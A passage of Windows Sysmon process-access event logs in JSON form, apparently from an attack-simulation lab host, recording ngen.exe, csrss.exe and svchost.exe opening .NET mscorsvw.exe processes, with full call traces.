(rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:19.059","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-00103FEF0C00}","TargetProcessId":"3476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7962,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:19.059\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-00103FEF0C00}\r\nTargetProcessId: 3476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:19.059","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-00103FEF0C00}","TargetProcessId":"3476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7963,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:19.059\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-00103FEF0C00}\r\nTargetProcessId: 3476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:19.059","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-00103FEF0C00}","TargetProcessId":"3476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7964,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:19.138\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-0010E1F20C00}\r\nTargetProcessId: 4804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:19.138","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-0010E1F20C00}","TargetProcessId":"4804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7965,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:19.138\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-0010E1F20C00}\r\nTargetProcessId: 4804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:19.138","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-0010E1F20C00}","TargetProcessId":"4804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7966,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:19.153\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133F-5F25-0000-001055560D00}\r\nTargetProcessId: 4804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:19.153","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133F-5F25-0000-001055560D00}","TargetProcessId":"4804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7967,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:19.169\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-001024F70C00}\r\nTargetProcessId: 484\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:19.169","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-001024F70C00}","TargetProcessId":"484","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7968,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:19.169\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-001024F70C00}\r\nTargetProcessId: 484\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:19.169","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-001024F70C00}","TargetProcessId":"484","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7969,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:19.184\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133F-5F25-0000-001051590D00}\r\nTargetProcessId: 484\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 